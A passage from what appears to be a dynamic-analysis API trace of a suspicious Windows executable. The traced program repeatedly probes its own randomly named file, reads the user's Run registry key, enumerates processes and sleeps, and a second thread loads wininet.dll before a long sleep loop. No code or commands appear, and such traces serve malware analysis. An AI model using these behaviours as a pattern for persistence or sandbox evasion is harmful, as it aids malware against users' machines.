Information=0x0)) returned 0xc000003a [0261.577] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7320c8) returned 1 [0261.577] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0261.577] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0261.577] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731b88) returned 1 [0261.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0261.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0261.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0261.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0261.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0261.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.786] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0261.798] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0261.799] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0261.799] NtClose (Handle=0x270) returned 0x0 [0261.799] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0261.799] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0261.799] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731cd8) returned 1 [0261.799] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0261.799] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0261.799] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731aa8) returned 1 [0261.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0261.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0261.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0261.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0261.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0262.323] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.324] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0262.341] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0262.343] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0262.343] NtClose (Handle=0x270) returned 0x0 [0262.343] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.343] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0262.344] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731b18) returned 1 [0262.344] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0262.344] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0262.344] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731db8) returned 1 [0262.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0262.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0262.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0262.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0262.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0263.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0263.291] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0263.384] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0263.386] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0263.386] NtClose (Handle=0x270) returned 0x0 [0263.386] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0263.386] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0263.386] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731cd8) returned 1 [0263.386] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0263.386] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0263.387] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7320c8) returned 1 [0263.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0263.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0263.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0263.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0263.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 Thread: id = 63 os_tid = 0x798 Thread: id = 69 os_tid = 0x810 [0137.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6bff58*=0x0, ZeroBits=0x0, RegionSize=0x6bff5c*=0x28048, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x6bff58*=0x6c0000, RegionSize=0x6bff5c*=0x29000) returned 0x0 [0137.148] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="wininet.dll", BaseAddress=0x6bff44 | out: BaseAddress=0x6bff44*=0x70770000) returned 0x0 [0137.806] Sleep (dwMilliseconds=0x7d0) [0139.841] Sleep (dwMilliseconds=0x7d0) [0141.851] Sleep (dwMilliseconds=0x7d0) [0148.908] Sleep (dwMilliseconds=0x7d0) [0150.964] Sleep (dwMilliseconds=0x7d0) [0152.976] Sleep (dwMilliseconds=0x7d0) [0155.054] Sleep (dwMilliseconds=0x7d0) [0157.058] Sleep (dwMilliseconds=0x7d0) [0159.166] Sleep (dwMilliseconds=0x7d0) [0161.198] Sleep (dwMilliseconds=0x7d0) [0163.249] Sleep (dwMilliseconds=0x7d0) [0163.498] Sleep (dwMilliseconds=0x7d0) [0163.591] Sleep (dwMilliseconds=0x7d0) [0163.595] Sleep (dwMilliseconds=0x7d0) [0163.597] Sleep (dwMilliseconds=0x7d0) [0163.606] Sleep (dwMilliseconds=0x7d0) [0163.610] Sleep (dwMilliseconds=0x7d0) [0163.620] Sleep (dwMilliseconds=0x7d0) [0163.626] Sleep (dwMilliseconds=0x7d0) [0163.630] Sleep (dwMilliseconds=0x7d0) [0163.635] Sleep (dwMilliseconds=0x7d0) [0163.639] Sleep (dwMilliseconds=0x7d0) [0163.644] Sleep (dwMilliseconds=0x7d0) [0163.652] Sleep (dwMilliseconds=0x7d0) [0163.656] Sleep (dwMilliseconds=0x7d0) [0163.662] Sleep (dwMilliseconds=0x7d0) [0163.665] Sleep (dwMilliseconds=0x7d0) [0163.670] Sleep (dwMilliseconds=0x7d0) [0163.672] Sleep (dwMilliseconds=0x7d0) [0163.675] Sleep (dwMilliseconds=0x7d0) [0163.684] Sleep (dwMilliseconds=0x7d0) [0163.687] Sleep (dwMilliseconds=0x7d0) [0163.689] Sleep (dwMilliseconds=0x7d0) [0163.740] Sleep (dwMilliseconds=0x7d0) [0163.836] Sleep (dwMilliseconds=0x7d0) [0163.955] Sleep (dwMilliseconds=0x7d0) [0164.060] Sleep (dwMilliseconds=0x7d0) [0164.068] Sleep (dwMilliseconds=0x7d0) [0164.073] Sleep (dwMilliseconds=0x7d0) [0164.078] Sleep (dwMilliseconds=0x7d0) [0164.080] Sleep (dwMilliseconds=0x7d0) [0164.082] Sleep (dwMilliseconds=0x7d0) [0164.088] Sleep (dwMilliseconds=0x7d0) [0164.093] Sleep (dwMilliseconds=0x7d0) [0164.099] Sleep (dwMilliseconds=0x7d0) [0164.103] Sleep (dwMilliseconds=0x7d0) [0164.106] Sleep (dwMilliseconds=0x7d0) [0164.110] Sleep (dwMilliseconds=0x7d0) [0164.117] Sleep (dwMilliseconds=0x7d0) [0164.120] Sleep (dwMilliseconds=0x7d0) [0164.124] Sleep (dwMilliseconds=0x7d0) [0164.127] Sleep (dwMilliseconds=0x7d0) [0164.136] Sleep (dwMilliseconds=0x7d0) [0164.162] Sleep (dwMilliseconds=0x7d0) [0164.247] Sleep (dwMilliseconds=0x7d0) [0164.435] Sleep (dwMilliseconds=0x7d0) [0164.524] Sleep (dwMilliseconds=0x7d0) [0164.606] Sleep (dwMilliseconds=0x7d0) [0164.609] Sleep (dwMilliseconds=0x7d0) [0164.628] Sleep (dwMilliseconds=0x7d0) [0164.633] Sleep (dwMilliseconds=0x7d0) [0164.640] Sleep (dwMilliseconds=0x7d0) [0164.645] Sleep (dwMilliseconds=0x7d0) [0164.648] Sleep (dwMilliseconds=0x7d0) [0164.652] Sleep (dwMilliseconds=0x7d0) [0164.654] Sleep (dwMilliseconds=0x7d0) [0164.659] Sleep (dwMilliseconds=0x7d0) [0164.674] Sleep (dwMilliseconds=0x7d0) [0164.685] Sleep (dwMilliseconds=0x7d0) [0164.691] Sleep (dwMilliseconds=0x7d0) [0164.695] Sleep (dwMilliseconds=0x7d0) [0164.700] Sleep (dwMilliseconds=0x7d0) [0164.704] Sleep (dwMilliseconds=0x7d0) [0164.706] Sleep (dwMilliseconds=0x7d0) [0164.708] Sleep (dwMilliseconds=0x7d0) [0164.715] Sleep (dwMilliseconds=0x7d0) [0164.718] Sleep (dwMilliseconds=0x7d0) [0164.720] Sleep (dwMilliseconds=0x7d0) [0164.731] Sleep (dwMilliseconds=0x7d0) [0164.734] Sleep (dwMilliseconds=0x7d0) [0164.736] Sleep (dwMilliseconds=0x7d0) [0164.810] Sleep (dwMilliseconds=0x7d0) [0164.886] Sleep (dwMilliseconds=0x7d0) [0164.983] Sleep (dwMilliseconds=0x7d0) [0164.986] Sleep (dwMilliseconds=0x7d0) [0164.989] Sleep (dwMilliseconds=0x7d0) [0164.993] Sleep (dwMilliseconds=0x7d0) [0164.997] Sleep (dwMilliseconds=0x7d0) [0165.102] Sleep (dwMilliseconds=0x7d0) [0165.153] Sleep (dwMilliseconds=0x7d0) [0165.319] Sleep (dwMilliseconds=0x7d0) [0165.360] Sleep (dwMilliseconds=0x7d0) [0165.404] Sleep (dwMilliseconds=0x7d0) [0165.447] Sleep (dwMilliseconds=0x7d0) [0165.496] Sleep (dwMilliseconds=0x7d0) [0165.649] Sleep (dwMilliseconds=0x7d0) [0165.721] Sleep (dwMilliseconds=0x7d0) [0165.843] Sleep (dwMilliseconds=0x7d0) [0165.937] Sleep (dwMilliseconds=0x7d0) [0166.183] Sleep (dwMilliseconds=0x7d0) [0166.333] Sleep (dwMilliseconds=0x7d0) [0166.431] Sleep (dwMilliseconds=0x7d0) [0166.503] Sleep (dwMilliseconds=0x7d0) [0166.573] Sleep (dwMilliseconds=0x7d0) [0166.712] Sleep (dwMilliseconds=0x7d0) [0166.851] Sleep (dwMilliseconds=0x7d0) [0167.007] Sleep (dwMilliseconds=0x7d0) [0167.136] Sleep (dwMilliseconds=0x7d0) [0167.146] Sleep (dwMilliseconds=0x7d0) [0167.155] Sleep (dwMilliseconds=0x7d0) [0167.182] Sleep (dwMilliseconds=0x7d0) [0167.192] Sleep (dwMilliseconds=0x7d0) [0167.197] Sleep (dwMilliseconds=0x7d0) [0167.200] Sleep (dwMilliseconds=0x7d0) [0167.211] Sleep (dwMilliseconds=0x7d0) [0167.224] Sleep (dwMilliseconds=0x7d0) [0167.245] Sleep (dwMilliseconds=0x7d0) [0167.272] Sleep (dwMilliseconds=0x7d0) [0167.276] Sleep (dwMilliseconds=0x7d0) [0167.280] Sleep (dwMilliseconds=0x7d0) [0167.285] Sleep (dwMilliseconds=0x7d0) [0167.296] Sleep (dwMilliseconds=0x7d0) [0167.304] Sleep (dwMilliseconds=0x7d0) [0167.355] Sleep (dwMilliseconds=0x7d0) [0167.358] Sleep (dwMilliseconds=0x7d0) [0167.367] Sleep (dwMilliseconds=0x7d0) [0167.406] Sleep (dwMilliseconds=0x7d0) [0167.474] Sleep (dwMilliseconds=0x7d0) [0167.540] Sleep (dwMilliseconds=0x7d0) [0167.592] Sleep (dwMilliseconds=0x7d0) [0167.631] Sleep (dwMilliseconds=0x7d0) [0167.638] Sleep (dwMilliseconds=0x7d0) [0167.645] Sleep (dwMilliseconds=0x7d0) [0167.661] Sleep (dwMilliseconds=0x7d0) [0167.672] Sleep (dwMilliseconds=0x7d0) [0167.681] Sleep (dwMilliseconds=0x7d0) [0167.708] Sleep (dwMilliseconds=0x7d0) [0167.713] Sleep (dwMilliseconds=0x7d0) [0167.724] Sleep (dwMilliseconds=0x7d0) [0167.742] Sleep (dwMilliseconds=0x7d0) [0167.768] Sleep (dwMilliseconds=0x7d0) [0167.831] Sleep (dwMilliseconds=0x7d0) [0167.874] Sleep (dwMilliseconds=0x7d0) [0167.884] Sleep (dwMilliseconds=0x7d0) [0167.887] Sleep (dwMilliseconds=0x7d0) [0167.898] Sleep (dwMilliseconds=0x7d0) [0167.913] Sleep (dwMilliseconds=0x7d0) [0168.032] Sleep (dwMilliseconds=0x7d0) [0168.036] Sleep (dwMilliseconds=0x7d0) [0168.041] Sleep (dwMilliseconds=0x7d0) [0168.043] Sleep (dwMilliseconds=0x7d0) [0168.053] Sleep (dwMilliseconds=0x7d0) [0168.067] Sleep (dwMilliseconds=0x7d0) [0168.088] Sleep (dwMilliseconds=0x7d0) [0168.136] Sleep (dwMilliseconds=0x7d0) [0168.145] Sleep (dwMilliseconds=0x7d0) [0168.150] Sleep (dwMilliseconds=0x7d0) [0168.162] Sleep (dwMilliseconds=0x7d0) [0168.183] Sleep (dwMilliseconds=0x7d0) [0168.216] Sleep (dwMilliseconds=0x7d0) [0168.259] Sleep (dwMilliseconds=0x7d0) [0168.268] Sleep (dwMilliseconds=0x7d0) [0168.278] Sleep (dwMilliseconds=0x7d0) [0168.289] Sleep (dwMilliseconds=0x7d0) [0168.309] Sleep (dwMilliseconds=0x7d0) [0168.481] Sleep (dwMilliseconds=0x7d0) [0168.527] Sleep (dwMilliseconds=0x7d0) [0168.591] Sleep (dwMilliseconds=0x7d0) [0168.725] Sleep (dwMilliseconds=0x7d0) [0168.857] Sleep (dwMilliseconds=0x7d0) [0168.880] Sleep (dwMilliseconds=0x7d0) [0168.898] Sleep (dwMilliseconds=0x7d0) [0168.968] Sleep (dwMilliseconds=0x7d0) [0168.977] Sleep (dwMilliseconds=0x7d0) [0168.981] Sleep (dwMilliseconds=0x7d0) [0168.985] Sleep (dwMilliseconds=0x7d0) [0169.000] Sleep (dwMilliseconds=0x7d0) [0169.023] Sleep (dwMilliseconds=0x7d0) [0169.041] Sleep (dwMilliseconds=0x7d0) [0169.081] Sleep (dwMilliseconds=0x7d0) [0169.087] Sleep (dwMilliseconds=0x7d0) [0169.095] Sleep (dwMilliseconds=0x7d0) [0169.103] Sleep (dwMilliseconds=0x7d0) [0169.216] Sleep (dwMilliseconds=0x7d0) [0169.299] Sleep (dwMilliseconds=0x7d0) [0169.325] Sleep (dwMilliseconds=0x7d0) [0169.406] Sleep (dwMilliseconds=0x7d0) [0169.463] Sleep (dwMilliseconds=0x7d0) [0169.542] Sleep (dwMilliseconds=0x7d0) [0169.690] Sleep (dwMilliseconds=0x7d0) [0169.725] Sleep (dwMilliseconds=0x7d0) [0169.760] Sleep (dwMilliseconds=0x7d0) [0169.823] Sleep (dwMilliseconds=0x7d0) [0169.877] Sleep (dwMilliseconds=0x7d0) [0169.935] Sleep (dwMilliseconds=0x7d0) [0169.944] Sleep (dwMilliseconds=0x7d0) [0169.957] Sleep (dwMilliseconds=0x7d0) [0169.980] Sleep (dwMilliseconds=0x7d0) [0170.014] Sleep (dwMilliseconds=0x7d0) [0170.037] Sleep (dwMilliseconds=0x7d0) [0170.053] Sleep (dwMilliseconds=0x7d0) [0170.056] Sleep (dwMilliseconds=0x7d0) [0170.071] Sleep (dwMilliseconds=0x7d0) [0170.091] Sleep (dwMilliseconds=0x7d0) [0170.132] Sleep (dwMilliseconds=0x7d0) [0170.169] Sleep (dwMilliseconds=0x7d0) [0170.177] Sleep (dwMilliseconds=0x7d0) [0170.250] Sleep (dwMilliseconds=0x7d0) [0170.259] Sleep (dwMilliseconds=0x7d0) [0170.270] Sleep (dwMilliseconds=0x7d0) [0170.281] Sleep (dwMilliseconds=0x7d0) [0170.294] Sleep (dwMilliseconds=0x7d0) [0170.311] Sleep (dwMilliseconds=0x7d0) [0170.396] Sleep (dwMilliseconds=0x7d0) [0170.407] Sleep (dwMilliseconds=0x7d0) [0170.422] Sleep (dwMilliseconds=0x7d0) [0170.434] Sleep (dwMilliseconds=0x7d0) [0170.436] Sleep (dwMilliseconds=0x7d0) [0170.452] Sleep (dwMilliseconds=0x7d0) [0170.484] Sleep (dwMilliseconds=0x7d0) [0170.527] Sleep (dwMilliseconds=0x7d0) [0170.612] Sleep (dwMilliseconds=0x7d0) [0170.662] Sleep (dwMilliseconds=0x7d0) [0170.769] Sleep (dwMilliseconds=0x7d0) [0170.918] Sleep (dwMilliseconds=0x7d0) [0170.936] Sleep (dwMilliseconds=0x7d0) [0170.960] Sleep (dwMilliseconds=0x7d0) [0171.028] Sleep (dwMilliseconds=0x7d0) [0171.034] Sleep (dwMilliseconds=0x7d0) [0171.041] Sleep (dwMilliseconds=0x7d0) [0171.044] Sleep (dwMilliseconds=0x7d0) [0171.054] Sleep (dwMilliseconds=0x7d0) [0171.063] Sleep (dwMilliseconds=0x7d0) [0171.080] Sleep (dwMilliseconds=0x7d0) [0171.085] Sleep (dwMilliseconds=0x7d0) [0171.088] Sleep (dwMilliseconds=0x7d0) [0171.104] Sleep (dwMilliseconds=0x7d0) [0171.116] Sleep (dwMilliseconds=0x7d0) [0171.135] Sleep (dwMilliseconds=0x7d0) [0171.165] Sleep (dwMilliseconds=0x7d0) [0171.211] Sleep (dwMilliseconds=0x7d0) [0171.220] Sleep (dwMilliseconds=0x7d0) [0171.228] Sleep (dwMilliseconds=0x7d0) [0171.241] Sleep (dwMilliseconds=0x7d0) [0171.253] Sleep (dwMilliseconds=0x7d0) [0171.316] Sleep (dwMilliseconds=0x7d0) [0171.337] Sleep (dwMilliseconds=0x7d0) [0171.436] Sleep (dwMilliseconds=0x7d0) [0171.460] Sleep (dwMilliseconds=0x7d0) [0171.464] Sleep (dwMilliseconds=0x7d0) [0171.476] Sleep (dwMilliseconds=0x7d0) [0171.481] Sleep (dwMilliseconds=0x7d0) [0171.493] Sleep (dwMilliseconds=0x7d0) [0171.516] Sleep (dwMilliseconds=0x7d0) [0171.561] Sleep (dwMilliseconds=0x7d0) [0171.567] Sleep (dwMilliseconds=0x7d0) [0171.575] Sleep 